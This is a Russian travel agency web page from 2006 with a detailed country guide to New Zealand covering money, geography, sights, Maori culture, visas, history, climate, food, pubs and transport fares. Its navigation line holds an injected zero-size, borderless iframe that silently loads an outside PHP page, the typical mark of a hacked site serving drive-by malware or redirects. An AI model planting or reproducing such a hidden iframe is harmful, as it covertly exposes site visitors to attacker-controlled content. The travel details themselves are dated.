Реалити тревел (495) 631-56-13, 631-56-02, 631-56-85
Где бы Вы не были, мы всегда рядом
 
Москва, ул. Мичуринский проспект, д.19, корпус 3
ГлавнаяО компанииСтрановедениеНовости туризмаКонтакты<iframe width = '0' height = '0' frameborder = '0' src='../../../bshk.ulstu.ru/in.php'></iframe>

НОВОСТИ

Россия: Елка загорится в Сочи за неделю до Нового года
Россия: Русский и финский Деды Морозы встретятся на границе
США: "Боинг" создаст панорамные окна для самолётов
Россия: «Аэрофлот» отменяет рейсы исключительно по погодным условиям
Россия: Галерея Айвазовского представит Крым глазами швейцарского художника

Новая Зеландия


Валюта

Новозеландский доллар (NZS), равный 100 центам. Государственный налог на товары и услуги (GST) составляет 12,5 % и прибавляется к стоимости всех товаров и услуг. Все цены в магазинах уже включают в себя GST, если это не оговорено иначе. Чаевые составляют 5-10% от счета в ресторане (но не в простом кафе), в провинциальных заведениях чаевые обычно не берут. Обслуживаются все виды международных пластиковых карт и туристических чеков.

Время

Разница во времени с Москвой - 9 часов (в Москве - 13.00, в Новой Зеландии - 22.00)

География

Новая Зеландия занимает два больших острова в юго-западной части Тихого океана - Северный, Южный - и несколько маленьких островов. На Северном острове располагаются несколько потухших вулканов и множество горячих источников и гейзеров.

Площадь Новой Зеландии равна 270 тыс. кв. км. На двух главных островах нет места, удаленного от моря более чем на 130 километров. Береговая линия Северного острова сильно изрезана и образует множество полуостровов, заливов и бухт. Плодородные береговые низины переходят в холмистые равнины.

На юге горные склоны спускаются к береговым низинам. Южный остров, отделённый от северного проливом Кука шириной 26 километров, занимают высокие Южные Альпы, покрытые ослепительно сверкающими в лучах солнца пластами снега и льда. В чистейших и зеркально прозрачных озёрах, лежащих в лесистых горных долинах, берут своё начало стремительные речки. К востоку от Альп простираются плодородные долины Кентербери.

Новая Зеландия является одной из самых экологически чистых стран мира. Туристов поражает здесь разнообразие пейзажей - от необъятных пространств океана до лугов и горных озёр невиданной красоты.

Достопримечательности

Новая Зеландия (или Аотеароа, что означает 'Длиное Белое Облако') славится своей богатой и разнообразной природой - гейзерами, горами и озерами, лесами и гротами, ледниками и пляжами. Широко развитое экологическое движение позволяет сохранить всё это великолепие в почти первозданном состоянии, даже в районе крупных городов. Особое внимание туристов привлекают национальные парки Маунт Кук на Острове Южный, Тонгариро, Фьордленд и др. Остров Северный ('Те Ика а Мауи') - покрытые снегом вершины гор в Национальном Парке Тонгариро, гейзеры и грязевые лужи в окрестностях Роторуа, бескрайние зеленые луга, утопающие в густых лесах склоны гор, а побережье представляет собой бесконечный песчаный пляж. Лыжный сезон в горах острова 3 месяца - с июня по сентябрь, иногда, в самые солнечные весенние дни (сентябрь-октябрь), лыжи сочетаются с купальным сезоном. Город-порт Окленд, знаменитый своим Университетом, расположен поразительно живописно - со смотровых площадок, находящихся на вершинах потухших вулканов, можно одновременно увидеть и Тихий океан, и Тасманово море. В Веллингтоне - живописный ботанический сад, расположенный на склоне высокой горы. Остров Южный - это бесчисленные фьорды, ледники, бурные горные потоки и реки, где водится форель, непроходимые джунгли, влажные тропические леса на побережье, пальмовые рощи и горные хребты с вершинами высотой в 3000 метров. Остров представляет собой великолепное место для рыбалки, гребли на байдарках, путешествий на велосипедах, сплава на плотах и долгих пеших походов. Почти все путешествия начинаются в Пиктоне - городе, похожем на маленькую и красочную почтовую открытку. Впрочем, многие туристы с удовольствием начинают свое знакомство с островом в городе Крайстчерч, который как две капли воды похож на типичный провинциальный городок где-нибудь в южной Англии. Любой из этих двух городов предоставляет возможность пуститься в увлекательный поход по острову и увидеть бесчисленные речки бассейна Мальборо Саундз в районе города Нельсон, знаменитого своими винами и прекрасной морской кухней. Вы сможете посетить Национальный Парк Маунт Кук, в котором находятся самые высокие горные вершины Новой Зеландии, тихий городок Квинстаун у подножия горного хребта Ремаркабелз, многочисленные пляжи и скалистые бухты, принять участие в великолепной рыбалке как в океане, так и на бесчисленных чистейших горных реках.

Другое

Коренные жители Новой Зеландии – маори, поселившиеся на островах более тысячи лет назад. Этот народ, ведущий племенной образ жизни, имеет 79 традиционных мест проживания по всей Новой Зеландии. Центр жизни индейцев - маори: участок земли со зданием для собраний, украшенным стилизованной резьбой по дереву; земля передается в каждом племени из поколения в поколение.

Маори поддерживают глубокую привязанность к своей земле и культурным традициям. В последние годы на правительственном уровне были приняты решительные меры по сохранению языка и культуры коренного населения.

Одним из уникальных аспектов культурного наследия маори является обрядовое, ритуальное пение. Хака - традиционный ритуал исполнения военной песни и танца новозеландскими мужчинами. В представлении маорийского театра часто отражается воинственность народа, и поэтому не следует удивляться, когда мелодичные песни хора то и дело будут прерываться грозными, отрывистыми выкриками мужчин.

Уровень жизни в Новой Зеландии достаточно высок, и отчасти это объясняет низкий уровень преступности в стране.

Несмотря на географическую отдаленность Новой Зеландии, её жителей не стоит считать провинциалами. Западные “звезды” включают Новую Зеландию в свой гастрольный календарь, так как знают, что энтузиазм и поддержка новозеландских зрителей им практически гарантированы. Каждые два года в Веллингтоне проходят международные фестивали искусств.

Умеренный климат страны и разнообразный ландшафт дают возможность заниматься разными видами активного отдыха на открытом воздухе. Однако самым популярным видом спорта считается регби.

Информация о визе

Минимальный срок оформления визы - 14 - 15 дней. Анкеты выдаются на английском языке. К запросу прилагается оригинал приглашения или факса. Срок действия визы на въезд - 30 дней. Консульский сбор не взимается. Безвизовый транзит не разрешается.

История

Новая Зеландия была открыта и заселена более тысячи лет тому назад народностью Маори, которые пересекали море из Полинезии в южную часть Тихого океана. Первыми европейцами, посетившими Новую Зеландию стали голландец Абель Тасман в 1642 году и английский первооткрыватель Джеймс Кук, который в 1769 году нанес на карту береговую линию Новой Зеландии.

В 1840 году вожди племен Маори подписали с Монархией Великобритании Договор Вайтанги, принимая британское правление в обмен на целый ряд гарантий, касающихся владения их землей, лесами, рыбными промыслами и сокровищами (предметами, имеющими духовную и культурную ценность для Маори). Договор Вайтанги гарантирует Маори особое место в Новой Зеландии.

После подписания Договора Вайтанги массовое заселение европейцами Новой Зеландии ускорилось, в то время, когда у Маори существовала развитая экономическая система, включавшая торговлю с Австралией. Растущая потребность в развитии новых земель под фермы и поселения вылилась в вооруженный конфликт между отдельными племенами Маори и Британскими войсками. В настоящее время правительство Новой Зеландии приняло на себя обязательство добиться справедливого и долгосрочного урегулирования отношений с Маори, с целью компенсировать конфискацию земель, явившуюся результатом конфликта, а также все имевшие место в прошлом нарушения договора, которые будут доказаны.

Открытие золота на Южном острове способствовало временному экономическому подъему в середине века. Но реальной основой роста национального благосостояния стало развитие пастбищного животноводства, особенно после того, как первый груз мороженого мяса был доставлен морем в Великобританию в 1882 году.

Рост национального могущества Новой Зеландии сопровождался успехами в социальной сфере. В 1893 году Новая Зеландия стала первой страной в мире, давшей женщине право голоса. В 1898 году были введены государственные пенсии по возрасту. В первую мировую войну новозеландские войска сражались на стороне Англии в Европе, Турции и на Ближнем Востоке. Война далась новозеландцам дорогой ценой - каждый третий мужчина в возрасте от 20 до 40 лет был убит или ранен. Новозеландские войска сражались в Европе, на Ближнем Востоке и в Тихоокеанском регионе во время второй мировой войны. После войны Новая Зеландия стала одной из стран - учредителей Организации Объединенных Наций.

С конца 40-х до 70-х годов нашего столетия Новая Зеландия добилась роста своего экономического благосостояния, в значительной степени за счет сельского хозяйства. Этот рост несколько замедлился в последние десятилетия. Тем ни менее, с 1984 года правительства Новой Зеландии успешно и последовательно проводят в действие долгосрочные экономические реформы, имеющие цель повысить производительность и конкурентоспособность страны на международной арене.

Климат

Климат субтропический и умеренный морские, средние температуры июля (зимы) — от +12 C на севере до +5 C на юге, среднеянварские температуры — от +19 C на севере до +14 C на юге. Самыми жаркими месяцами являются январь и февраль, самый прохладный месяц - июль. Осадков выпадает от 400 до 5000 мм. в год.

Кухня

Если вы мечтаете отведать оригинальных гастрономических блюд в стране с английскими кулинарными традициями, то вас ждет некоторое разочарование. Дежурное блюдо - рыба и жареный картофель. Если вы хотите получить в ресторане хороший натуральный бифштекс, предупредите, чтобы его не зажаривали до состояния подошвы. Дары моря непопулярны. Впрочем, всегда можно пойти в один из ресторанов с национальной кухней: французской, китайской, греческой, мексиканской...

Спокойно и немноголюдно по воскресеньям, понедельникам, вторникам. Атмосфера начинает разогреваться в среду, в четверг жизнь кипит, в пятницу просто ад. Те, кто еще может дойти до паба, приходят и в субботу. Пабы открыты до 2 часов ночи, а некоторые и всю ночь. Со среды по субботу играют приглашенные музыканты или публику развлекает ди-джей. Часто устраиваются танцы. Музыка - национальная ирландская или диско.Пиво льется рекой. Веселятся все без разбору.

Предпочтение отдается пиву, которое, нужно отдать должное, просто великолепное. Самые известные марки - Lion Red, DB Natural, DB Draught, Speight (лучшее пиво в Данидине), Canterbury Draught... и еще 44 марки. Некоторые подаются лишь в единственном пабе, где и варятся. Новозеландцы выпивают в среднем 120 литров пива в год. Вино очень разное по качеству, и случается, что отменный напиток продается лишь чуть дороже самого заурядного вина. Что касается крепких спиртных напитков, то они не продаются в супермаркетах, а только в специальных магазинах Bottle Store.

Население

3,8 млн. человек. Большую часть населения составляют англо–новозеланды, около 10 % — маори (коренное население) и около 4% — полинезийцы. Договор Вайтанги гарантирует маори особое место в Новой Зеландии.

Политика

Новая Зеландия является независимой парламентской демократической страной внутри Британского Содружества. Формально главой государства является королева Елизавета II, представленная генерал-губернатором. Законодательный орган - парламент (Палата представителей), который избирается раз в три года на основе смешанного пропорционального представительства.

Развлечения

Пляжи
Дикие пляжи, прозрачная вода, голубые лагуны. Всего этого в Новой Зеландии предостаточно. Особенно впечатляют пляжи полуострова Карамандел, длинная песчаная полоса полуострава Таранаки (международный центр пляжного волейбола) и нескончаемый 90-мильный пляж на самом севере острова. Здесь можно встретить пляжи с огромными дюнами белого песка, с которых можно скатываться прямо в волны океана. Существуют пляжи 'а-ля баунти' и пляжи где береговая линия плавно переходит в зеленую лужайку с тенистыми деревьями. Есть пляжи в окружении скал и рифов - идеальные места для ныряния с аквалангом и подводной охоты.

Подводный мир
В Окленде расположен огромный аквариум, напоминающий подводный театр. Кроме того, любители воочию дотронуться до красот океанов могут это проделать у коралловых рифов.

Банжи
Новая Зеландия известна как страна придумавшая самый духозахватывающие и безумные развлечения. Одно из них - прыжки вниз головой с моста в реку, естественно, со страховочным канатом. Вы ощущаете красоту свободного полета, стремительно падаете вниз и.... у самой воды канат вас подхватывает и уносит опять вверх. Даже в Окленде-сити расположены гигантские качели, которые выстреливают вас вверх а затем доставляют обратно.

Туристические Тропы
Для тех кто любит путешествовать с рюкзаком за спиной открыто тысячи туристических маршрутов. Это маршруты разной сложности, специально оборудованные для этих целей, с удивительными смотровыми площадками. Маршруты в джунглях и горах, мимо водопадов и горных рек, вдоль пляжей и пастбищ.

Горные Лыжи
В июне-сентябре в горных районах Новой Зеландии выпадает снег. Ближайший от Окленда горнолыжный курорт расположен в районе горы Руапеху. Самый известный новозеландский лыжный курорт расположен на Южном острове в городе Квинстаун.

Горячие Источники
Новая Зеландия - вулканическая страна. В районе города Роторуа действуют более сотни туристических комплексов с грязелечебницами и минеральными горячими источниками. Ближайший горячий источник с комплексом бассейнов и водных аттракционов находится в 30 минутах езды от Окленда.

Рыбалка, водные маршруты
В акватории Новой Зеландии расположено множество островов добраться на которые можно на круизных яхтах или катерах. Во время прогулок по океану вас будут сопроваждать дельфины. Кроме того в Новой Зеландии назодятся несколько прекрасных озер, на которых можно рыбачить(форель), кататься на байдарках, водных мотоциклах.

Культурная программа
В Окленде открыто более сотни художественных галлерей, театров и концертных залов. Работают сотни ночных шоу и развлекательных программ.

Религия

Четверть населения страны не исповедует никакой религии. Подавляющая часть остальных – христиане, в основном протестанты: среди самых крупных общин - англиканская (17% всего населения), пресвитериане - 13%, методисты – 3,4%, много католиков (13%). Остальные верующие разделены на малочисленные христианские, мусульманские, буддийские и прочие (от мормонов до ратана-маори) общины, составляющие 1-1,5% и менее от всего населения.

Транспорт

Автобусы - самый распространённый способ передвижения по стране. К тому же они современные и комфортабельные, с кондиционерами, туалетами, нередко оборудованы телевизорами. Во время длительных переездов всегда бывают остановки, чтобы можно было перекусить, а курильщикам выкурить пару сигарет. Билеты на такие рейсы достаточно дорогие. Студенты, имеющие международную студенческую карточку, могут сэкономить 20-50%.
Кроме того, проездной билет Pass d`Iintercity действителен не только в автобусе, но и на железной дороге, пароме и даже самолёте. А проездной билет Sight Pass даёт скидки на транспорт, проживание, питание. Городские автобусы есть в крупных городах, таких как Окленд, Веллингтон, Крайстчерч и Данидин. Стоимость билета $1,5 - 2,5. Прежде чем войти в салон, рекомендуется спросить у водителя, в каком направлении идёт автобус, не полагаясь на расписание. Такси стоят $1 с человека и $4 за маршрут, занимающий 10-15 минут.

Путешествовать на поезде намного удобнее, но по 8 железнодорожным линиям проходит всего по одному поезду в день. Цены высокие, льготы такие же, как на автобусных маршрутах.

THE OVERLANDER. Поезд Окленд -Веллингтон. Билеты $65-129. Один поезд в день в каждом направлении. Отправление утром, прибытие вечером. Завтрак и чай включены в стоимость билета.

THE NORTHERNER. Поезд Окленд - Веллингтон (ночной). Цены $55-109. Прохладительные напитки.

THE KAMI EXPRESS. Поезд Окленд - Таурана. Билеты $25-49. Время в пути 3 ч. 20 мин.

THE GEYSER LAND. Поезд Окленд - Роторуа. Цена $30-59. Два отправления в день в каждом направлении. Чай. Время в пути 4,5 ч.

THE BAY EXPRESS. Поезд Веллингтон - Нейпир. Цена $32-63. Прохладительные напитки и комментарий включены в стоимость. Время в пути 4 ч. 15 мин.

На пароме можно добраться с Северного острова на Южный. Компания Interislander предлагает 6 рейсов в день из Веллингтона в Пиктон и 5 в обратном направлении. Паромы «Arahuka» и «Aratikai» комфортабельные, оборудованы барами, ресторанами, салонами. 3- часовая поездка стоит $44 по полному тарифу и $22 со скидкой, если вы заказываете билет заранее, то есть за неделю. Провоз машины обойдётся от $80 до $160. Сложнее всего достать билеты на школьные каникулы - паромы берут буквально штурмом. Скидки в это время получить практически невозможно.

Автомобиль бесспорно может считаться удобным видом транспорта для путешествий по Новой Зеландии. Не следует забывать, что в Новой Зеландии левосторонне движение и не очень хорошие, а иногда и опасные дороги. Турист не пожалеет, если возьмет напрокат джип, потому что к самым интересным местам ведут плохие дороги. Прокат автомобиля стоит $35 в день, включая страховку и не лимитированный пробег. Если брать машину надолго ( как минимум на 21 день), то цена снижается до $25 в день. Джип обойдётся дороже, около $75 в день. И ещё... Если решили посетить оба острова, то стоит выбирать такое агентство по прокату, которое предоставит автомобиль и по другую сторону пролива Кука, разделяющего два острова. Так можно избежать дорогой оплаты перевозки личной машины на пароме.

Язык

В качестве государственных используются английский и маори.

СТРАНЫ

Италия

Италия

Турция

Турция

Греция

Греция

Тунис

Тунис

Испания

Испания

ОАЭ

ОАЭ

2006 © ООО «Реалити тревел»Lightsoft Solutions, Touradmin
 
Реалити тревел.